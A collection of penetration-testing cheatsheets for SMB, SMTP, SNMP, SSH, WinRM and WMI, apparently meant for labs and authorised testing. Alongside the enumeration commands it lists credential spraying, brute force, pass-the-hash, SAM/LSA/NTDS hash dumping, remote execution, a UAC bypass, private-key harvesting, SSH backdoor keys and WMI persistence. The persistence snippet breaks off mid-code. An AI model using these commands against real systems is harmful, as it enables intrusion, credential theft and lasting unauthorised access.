SMB

SMB Enumeration Cheatsheet

Default Ports: 445 (TCP), 139 (TCP/NetBIOS), 137–138 (UDP)

Initial Scanning
nmap -p 139,445 -sV <ip>
nmap -p 445 --script smb-os-discovery <ip>
nmap -p 445 --script smb-security-mode <ip>
nmap -p 445 --script smb2-security-mode <ip>
nmap -p 139,445 --script smb-* <ip>      # All SMB scripts
nmap -p 445 --script smb-vuln-* <ip>     # All vuln checks

NetBIOS / NBT Scanning
nbtscan <ip>
nbtscan -r 192.168.1.0/24
nmblookup -A <ip>

enum4linux / enum4linux-ng
# Classic
enum4linux -a <ip>                      # All checks
enum4linux -u <user> -p <pass> <ip>     # Authenticated
enum4linux -S <ip>                      # Shares only
enum4linux -U <ip>                      # Users only
enum4linux -P <ip>                      # Password policy
# Newer (recommended)
enum4linux-ng -A <ip>
enum4linux-ng -A <ip> -u <user> -p <pass>
enum4linux-ng -A <ip> -oA output

smbclient
# List shares
smbclient -L //<ip>/ -N                  # Null session
smbclient -L //<ip>/ -U <user>%<pass>    # Authenticated
# Connect to share
smbclient //<ip>/<share> -N
smbclient //<ip>/<share> -U <user>%<pass>
smbclient //<ip>/<share> -U <domain>/<user>%<pass>
# Within smbclient shell
ls              # List files
cd <dir>        # Change directory
get <file>      # Download file
put <file>      # Upload file
recurse ON      # Enable recursive operations
prompt OFF      # Disable prompts
mget *          # Download everything
mput *          # Upload everything

CrackMapExec (CME)
# Basic info
crackmapexec smb <ip>
crackmapexec smb 192.168.1.0/24
# Authenticated enum
crackmapexec smb <ip> -u <user> -p <pass>
crackmapexec smb <ip> -u <user> -p <pass> --shares
crackmapexec smb <ip> -u <user> -p <pass> --users
crackmapexec smb <ip> -u <user> -p <pass> --groups
crackmapexec smb <ip> -u <user> -p <pass> --sessions
crackmapexec smb <ip> -u <user> -p <pass> --loggedon-users
crackmapexec smb <ip> -u <user> -p <pass> --local-groups
# Credential spraying
crackmapexec smb 192.168.1.0/24 -u <user> -p <pass> --continue-on-success
# Pass-the-Hash
crackmapexec smb <ip> -u <user> -H <nthash>
# Command execution
crackmapexec smb <ip> -u <user> -p <pass> -x 'whoami'   # CMD
crackmapexec smb <ip> -u <user> -p <pass> -X 'whoami'   # PowerShell
# Dump SAM/LSA
crackmapexec smb <ip> -u <user> -p <pass> --sam
crackmapexec smb <ip> -u <user> -p <pass> --lsa
crackmapexec smb <ip> -u <user> -p <pass> -M ntdsutil   # NTDS.dit

impacket Tools
python3 smbclient.py <domain>/<user>:<pass>@<ip>
python3 samrdump.py <domain>/<user>:<pass>@<ip>
python3 rpcdump.py <domain>/<user>:<pass>@<ip>
python3 lookupsid.py <domain>/<user>:<pass>@<ip>
python3 secretsdump.py <domain>/<user>:<pass>@<ip>   # Dump all hashes
python3 secretsdump.py -just-dc-ntlm <domain>/<user>:<pass>@<ip>

Mounting SMB Shares
# Linux mount
sudo mount -t cifs //<ip>/<share> /mnt/smb -o username=<user>,password=<pass>
sudo mount -t cifs //<ip>/<share> /mnt/smb -o username=<user>,password=<pass>,domain=<domain>

Key Vulnerabilities
CVE              Name                     Description
CVE-2017-0144    EternalBlue / MS17-010   SMBv1 RCE — WannaCry / NotPetya
CVE-2020-0796    SMBGhost                 SMBv3.1.1 compression RCE
CVE-2021-34527   PrintNightmare           Print Spooler RCE via SMB

# EternalBlue check
nmap -p 445 --script smb-vuln-ms17-010 <ip>
use auxiliary/scanner/smb/smb_ms17_010
# SMBGhost check
nmap -p 445 --script smb-vuln-cve2020-0796 <ip>
use auxiliary/scanner/smb/cve_2020_0796_smbghost

3 min · d3vilsec

SMTP

SMTP Enumeration Cheatsheet

Default Ports: 25 (SMTP), 587 (Submission/STARTTLS), 465 (SMTPS)

Banner Grabbing
nc -nv <ip> 25
telnet <ip> 25
openssl s_client -starttls smtp -connect <ip>:587
openssl s_client -connect <ip>:465

Manual SMTP Commands
HELO <domain>               # Basic hello
EHLO <domain>               # Extended hello (lists capabilities)
AUTH LOGIN                  # Start base64 auth
AUTH PLAIN                  # Plain auth
VRFY <user>                 # Verify if user exists
EXPN <list>                 # Expand mailing list members
RCPT TO:<user@domain>       # Verify recipient (within MAIL flow)
MAIL FROM:<[email protected]>
RCPT TO:<target@domain>
DATA                        # Begin message body
.                           # End message (single dot on its own line)
RSET                        # Reset connection state
QUIT

Capabilities Enumeration
# See what the server supports after EHLO
nc <ip> 25
EHLO test.com
# Common capabilities to note:
# STARTTLS, AUTH LOGIN/PLAIN/NTLM, SIZE, PIPELINING, VRFY, EXPN

User Enumeration
# smtp-user-enum tool
smtp-user-enum -M VRFY -U users.txt -t <ip>
smtp-user-enum -M EXPN -U users.txt -t <ip>
smtp-user-enum -M RCPT -U users.txt -t <ip> -D <domain>
# Manual VRFY loop
for user in $(cat users.txt); do
  echo VRFY $user | nc -nv -w 1 <ip> 25 2>/dev/null | grep "^250"
done
# Response codes:
# 250 = user exists
# 252 = can't verify but will attempt delivery
# 550 = user does not exist

Nmap Scripts
nmap -p 25 --script smtp-commands <ip>
nmap -p 25 --script smtp-enum-users <ip>
nmap -p 25 --script smtp-open-relay <ip>
nmap -p 25 --script smtp-brute <ip>
nmap -p 25 --script smtp-ntlm-info <ip>            # Windows NTLM info leak
nmap -p 25 --script smtp-vuln-cve2010-4344 <ip>    # Exim heap overflow
nmap -p 25,587,465 --script smtp-* <ip>

Open Relay Testing
nc <ip> 25
EHLO test.com
MAIL FROM:<[email protected]>
RCPT TO:<[email protected]>   # If accepted = open relay!
DATA
Subject: relay test

This is a test.
.
QUIT
# Automated
nmap -p 25 --script smtp-open-relay \
  --script-args [email protected],[email protected] <ip>

Metasploit
use auxiliary/scanner/smtp/smtp_version
use auxiliary/scanner/smtp/smtp_enum
use auxiliary/scanner/smtp/smtp_relay

NTLM Info Leak (Windows SMTP)
# Triggers Windows SMTP servers to reveal hostname, domain, OS version
nmap -p 25 --script smtp-ntlm-info <ip>
# Manual
nc <ip> 25
EHLO test
AUTH NTLM
TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA=
# Decode the Base64 response with ntlmdecoder or responder

Useful Wordlists
/usr/share/seclists/Usernames/top-usernames-shortlist.txt
/usr/share/seclists/Usernames/xato-net-10-million-usernames.txt

2 min · d3vilsec

SNMP

SNMP Enumeration Cheatsheet

Default Ports: 161 (UDP — queries), 162 (UDP — traps)

SNMP Versions
Version   Auth                           Notes
v1        Community string               Cleartext, oldest
v2c       Community string               Cleartext, most common
v3        Username + auth + encryption   Secure, rarely misconfigured

Detection
nmap -sU -p 161 <ip>
nmap -sU -p 161 -sV <ip>
nmap -sU -p 161 --script snmp-info <ip>

Community String Brute Force
# onesixtyone (fast UDP brute)
onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt <ip>
onesixtyone -c community.txt -i ips.txt
# Nmap
nmap -sU -p 161 --script snmp-brute <ip>
nmap -sU -p 161 --script snmp-brute \
  --script-args snmp-brute.communitiesdb=communities.txt <ip>
# Metasploit
use auxiliary/scanner/snmp/snmp_login
set RHOSTS <ip>
run

snmpwalk — Walking the MIB Tree
# Full walk (v1/v2c)
snmpwalk -v1 -c public <ip>
snmpwalk -v2c -c public <ip>
# Target specific OIDs
snmpwalk -v2c -c public <ip> 1.3.6.1.2.1.1             # System info
snmpwalk -v2c -c public <ip> 1.3.6.1.2.1.25.4.2        # Running processes
snmpwalk -v2c -c public <ip> 1.3.6.1.2.1.25.6.3        # Installed software
snmpwalk -v2c -c public <ip> 1.3.6.1.2.1.6.13.1.3      # Open TCP ports
snmpwalk -v2c -c public <ip> 1.3.6.1.4.1.77.1.2.25     # Windows user accounts
snmpwalk -v2c -c public <ip> 1.3.6.1.2.1.2.2           # Network interfaces
# SNMPv3
snmpwalk -v3 -u <user> -l AuthPriv \
  -a MD5 -A <authpass> -x DES -X <privpass> <ip>

snmpget — Single OID Query
snmpget -v2c -c public <ip> 1.3.6.1.2.1.1.1.0    # sysDescr
snmpget -v2c -c public <ip> 1.3.6.1.2.1.1.5.0    # sysName (hostname)
snmpget -v2c -c public <ip> 1.3.6.1.2.1.1.6.0    # sysLocation

snmp-check
snmp-check <ip>
snmp-check <ip> -c public
snmp-check <ip> -c public -v 2c

braa — Bulk SNMP
braa public@<ip>:.1.3.6.*
braa [email protected]:.1.3.6.1.2.1.1.1.0

Nmap SNMP Scripts
nmap -sU -p 161 --script snmp-info <ip>
nmap -sU -p 161 --script snmp-sysdescr <ip>
nmap -sU -p 161 --script snmp-interfaces <ip>
nmap -sU -p 161 --script snmp-processes <ip>
nmap -sU -p 161 --script snmp-win32-users <ip>
nmap -sU -p 161 --script snmp-win32-services <ip>
nmap -sU -p 161 --script snmp-win32-software <ip>
nmap -sU -p 161 --script snmp-* <ip>

Key OIDs Reference
OID                       Description
1.3.6.1.2.1.1.1.0         System description
1.3.6.1.2.1.1.3.0         System uptime
1.3.6.1.2.1.1.5.0         Hostname
1.3.6.1.2.1.1.6.0         System location
1.3.6.1.2.1.25.1.6.0      Running OS processes
1.3.6.1.2.1.25.4.2.1.2    Process names
1.3.6.1.2.1.25.6.3.1.2    Installed packages
1.3.6.1.4.1.77.1.2.25     Windows user accounts
1.3.6.1.2.1.6.13.1.3      TCP open ports
1.3.6.1.2.1.2.2.1.2       Interface names
1.3.6.1.2.1.2.2.1.11      Interface in-packets

Common Community Strings
public
private
manager
community
snmp
cisco
monitor
0
internal

2 min · d3vilsec

SSH

SSH Enumeration Cheatsheet

Default Port: 22 (TCP)

Banner & Info Gathering
nc -nv <ip> 22           # Banner grab
ssh -v <user>@<ip>       # Verbose handshake output
ssh -V                   # Local SSH client version
# Nmap scripts
nmap -p 22 -sV <ip>
nmap -p 22 --script ssh-hostkey <ip>
nmap -p 22 --script ssh2-enum-algos <ip>
nmap -p 22 --script ssh-auth-methods \
  --script-args ssh.user=<user> <ip>
nmap -p 22 --script sshv1 <ip>    # Check for insecure SSHv1

ssh-audit (Configuration Security Check)
ssh-audit <ip>
ssh-audit <ip> -p 22
# Flags to note:
# [fail] = critical issue
# [warn] = should be fixed
# Lists: KEX, hostkey, encryption, MAC algorithms

User Enumeration
# CVE-2018-15473 (OpenSSH < 7.7 username enumeration)
python3 ssh_user_enum.py --userList users.txt --ip <ip>
# Metasploit
use auxiliary/scanner/ssh/ssh_enumusers
set RHOSTS <ip>
set USER_FILE users.txt
run

Brute Force
# Hydra
hydra -l <user> -P wordlist.txt ssh://<ip>
hydra -L users.txt -P wordlist.txt ssh://<ip>
hydra -l <user> -P wordlist.txt -s 2222 ssh://<ip>    # Custom port
# Medusa
medusa -h <ip> -u <user> -P wordlist.txt -M ssh
# Nmap
nmap -p 22 --script ssh-brute <ip>
nmap -p 22 --script ssh-brute \
  --script-args userdb=users.txt,passdb=pass.txt <ip>
# Metasploit
use auxiliary/scanner/ssh/ssh_login
set RHOSTS <ip>
set USERNAME <user>
set PASS_FILE wordlist.txt
run

Key-Based Attacks
# Connect with private key
ssh -i id_rsa <user>@<ip>
chmod 600 id_rsa && ssh -i id_rsa <user>@<ip>
# Crack passphrase on private key
ssh2john id_rsa > ssh_hash.txt
john ssh_hash.txt --wordlist=wordlist.txt
hashcat -m 22921 ssh_hash.txt wordlist.txt    # Ed25519
hashcat -m 22911 ssh_hash.txt wordlist.txt    # RSA
# Scan for keys (key harvesting after initial access)
find / -name "id_rsa" -o -name "id_ecdsa" -o -name "id_ed25519" 2>/dev/null
find / -name "*.pem" -o -name "*.key" 2>/dev/null

SSH Key Scanning
# Collect host keys
ssh-keyscan <ip>
ssh-keyscan -t rsa,ecdsa,ed25519 <ip>
ssh-keyscan -p 2222 <ip>
# Scan range
ssh-keyscan -f hosts.txt > known_hosts

Interesting Files to Grab Post-Access
~/.ssh/id_rsa                # Private key
~/.ssh/id_rsa.pub            # Public key
~/.ssh/authorized_keys       # Authorized keys (add yours for persistence)
~/.ssh/known_hosts           # Previous connections (network map)
/etc/ssh/sshd_config         # Server configuration
/etc/ssh/ssh_host_rsa_key    # Host private key

Add Backdoor SSH Key (Post-Exploitation)
# On attacker machine
ssh-keygen -t rsa -b 4096 -f backdoor
# On target (append to authorized_keys)
echo "ssh-rsa AAAA..." >> ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys
# Connect back
ssh -i backdoor <user>@<ip>

Common Misconfigurations to Check
PermitRootLogin yes — Root login allowed
PasswordAuthentication yes — Passwords accepted (brutable)
PermitEmptyPasswords yes — Blank passwords allowed
AuthorizedKeysFile .ssh/authorized_keys — Key auth path
AllowUsers / DenyUsers — User restrictions
Port 22 — Non-standard port may indicate stealth

2 min · d3vilsec

WinRM

WinRM Enumeration Cheatsheet

Default Ports: 5985 (HTTP / WS-Management), 5986 (HTTPS)

What is WinRM?
Windows Remote Management — Microsoft’s implementation of WS-Management. Used for remote PowerShell, remote command execution, and administration.

Detection
nmap -p 5985,5986 <ip>
nmap -p 5985,5986 -sV <ip>
curl -s http://<ip>:5985/wsman
curl -sk https://<ip>:5986/wsman

Evil-WinRM
# Password auth (HTTP)
evil-winrm -i <ip> -u <user> -p <pass>
# SSL (HTTPS, port 5986)
evil-winrm -i <ip> -u <user> -p <pass> -S
# Pass-the-Hash (NTLM)
evil-winrm -i <ip> -u <user> -H <nthash>
# With scripts and executables directory
evil-winrm -i <ip> -u <user> -p <pass> \
  -s /path/to/ps1_scripts/ \
  -e /path/to/executables/
# Within evil-winrm shell
menu                         # Show built-in commands
upload /local/file.exe       # Upload file
download C:\file.txt         # Download file
Invoke-Binary /local/exe     # Run local exe in memory
bypass_uac                   # UAC bypass

CrackMapExec
# Test credentials
crackmapexec winrm <ip> -u <user> -p <pass>
crackmapexec winrm 192.168.1.0/24 -u <user> -p <pass>
# Credential spray
crackmapexec winrm <ip> -u users.txt -p <pass>
crackmapexec winrm <ip> -u <user> -p wordlist.txt
# Pass-the-Hash
crackmapexec winrm <ip> -u <user> -H <nthash>
# Execute commands
crackmapexec winrm <ip> -u <user> -p <pass> -x 'whoami'        # CMD
crackmapexec winrm <ip> -u <user> -p <pass> -X 'whoami'        # PowerShell
crackmapexec winrm <ip> -u <user> -p <pass> -X 'Get-Process'

PowerShell / Windows Native
# Test WinRM connectivity
Test-WSMan -ComputerName <ip>
Test-WSMan -ComputerName <ip> -UseSSL
# Interactive remote session
Enter-PSSession -ComputerName <ip> -Credential <user>
Enter-PSSession -ComputerName <ip> -UseSSL -Credential <user>
# Non-interactive / scripted
$cred = Get-Credential
$sess = New-PSSession -ComputerName <ip> -Credential $cred
Invoke-Command -Session $sess -ScriptBlock { whoami; hostname }
Invoke-Command -ComputerName <ip> -Credential $cred -ScriptBlock { ipconfig }
# Copy files over WinRM
Copy-Item -Path C:\local\file.exe -Destination C:\remote\ -ToSession $sess
Copy-Item -Path C:\remote\loot.txt -Destination C:\local\ -FromSession $sess

impacket
# winrm_exec (alternative)
python3 winrm_exec.py <domain>/<user>:<pass>@<ip>

Brute Force
crackmapexec winrm <ip> -u <user> -p wordlist.txt
hydra -l <user> -P wordlist.txt <ip> -s 5985 http-post-form \
  "/wsman:Username=^USER^&Password=^PASS^:401"

Common Scenarios
Pwned user is in group:
"Remote Management Users" → Can use WinRM
"Administrators" → Full access via WinRM
Check group membership:
net localgroup "Remote Management Users"

Key Facts
Requires user to be in Remote Management Users or Administrators group
Can be enabled with: Enable-PSRemoting -Force
Firewall rule: WinRM-HTTP-In-TCP (port 5985)
Often enabled on Domain Controllers and management servers

2 min · d3vilsec

WMI

WMI Enumeration Cheatsheet

Default Ports: 135 (DCOM endpoint mapper), dynamic high ports (TCP 49152–65535)

What is WMI?
Windows Management Instrumentation — a core Windows API for querying system state and executing code remotely. Uses DCOM over RPC.

Detection
nmap -p 135 <ip>
nmap -p 135 -sV <ip>
nmap -p 135 --script msrpc-enum <ip>

impacket — wmiexec.py
# Interactive shell
python3 wmiexec.py <domain>/<user>:<pass>@<ip>
# Single command
python3 wmiexec.py <domain>/<user>:<pass>@<ip> "whoami"
python3 wmiexec.py <domain>/<user>:<pass>@<ip> "ipconfig /all"
# Pass-the-Hash
python3 wmiexec.py -hashes :<nthash> <domain>/<user>@<ip>
python3 wmiexec.py -hashes <lmhash>:<nthash> <domain>/<user>@<ip>
# Without domain (local account)
python3 wmiexec.py ./<user>:<pass>@<ip>

CrackMapExec
crackmapexec wmi <ip> -u <user> -p <pass>
crackmapexec wmi <ip> -u <user> -p <pass> -x 'whoami'
crackmapexec wmi <ip> -u <user> -H <nthash>
crackmapexec wmi 192.168.1.0/24 -u <user> -p <pass>

PowerShell WMI (Local & Remote)
# Local system queries
Get-WmiObject -Class Win32_OperatingSystem
Get-WmiObject -Class Win32_ComputerSystem
Get-WmiObject -Class Win32_Process
Get-WmiObject -Class Win32_UserAccount
Get-WmiObject -Class Win32_Group
Get-WmiObject -Class Win32_NetworkAdapterConfiguration | Where IPAddress -ne $null
Get-WmiObject -Class Win32_Service | Where-Object { $_.State -eq "Running" }
Get-WmiObject -Class Win32_Product          # Installed software (slow)
Get-WmiObject -Class Win32_LogicalDisk
Get-WmiObject -Class Win32_StartupCommand   # Startup items
# Modern equivalent (CIM)
Get-CimInstance -ClassName Win32_OperatingSystem
Get-CimInstance -ClassName Win32_Process
# Remote queries
$cred = Get-Credential
Get-WmiObject -Class Win32_OperatingSystem -ComputerName <ip> -Credential $cred
Get-WmiObject -Class Win32_Process -ComputerName <ip> -Credential $cred

PowerShell WMI Remote Code Execution
# Execute command via WMI (leaves process behind)
$cred = Get-Credential
Invoke-WmiMethod -Class Win32_Process -Name Create `
  -ArgumentList "cmd.exe /c whoami > C:\output.txt" `
  -ComputerName <ip> -Credential $cred
# Check output (the backslash in the path must be escaped inside the WQL filter)
Get-WmiObject -Class CIM_DataFile -Filter "Name='C:\\output.txt'" `
  -ComputerName <ip> -Credential $cred

wmic (Legacy CLI — Windows)
:: Local
wmic os get Caption,Version,BuildNumber
wmic process list brief
wmic useraccount list brief
wmic group list brief
wmic service where "State='Running'" list brief
:: Installed software
wmic product get Name,Version
wmic startupinfo list full
:: Remote
wmic /node:<ip> /user:<user> /password:<pass> os get Caption
wmic /node:<ip> /user:<user> /password:<pass> process call create "cmd.exe /c whoami > C:\out.txt"
wmic /node:<ip> /user:<user> /password:<pass> useraccount list brief

WQL Queries
# WQL = WMI Query Language (SQL-like)
Get-WmiObject -Query "SELECT * FROM Win32_Process WHERE Name='lsass.exe'"
Get-WmiObject -Query "SELECT * FROM Win32_Service WHERE StartMode='Auto' AND State='Stopped'"
Get-WmiObject -Query "SELECT * FROM Win32_UserAccount WHERE LocalAccount=True"

Metasploit
use exploit/windows/smb/psexec             # Uses WMI/DCOM under the hood
use exploit/windows/local/wmi              # Post-exploitation WMI persistence
use auxiliary/scanner/winrm/winrm_wql      # WQL via WinRM

WMI Persistence (Post-Exploitation)
# Create permanent WMI event subscription (fileless persistence)
$filter = Set-WmiInstance -Class __EventFilter -Namespace "root\subscription" -Arguments @{
    Name = "PentestFilter"
    EventNameSpace = "root

2 min · d3vilsec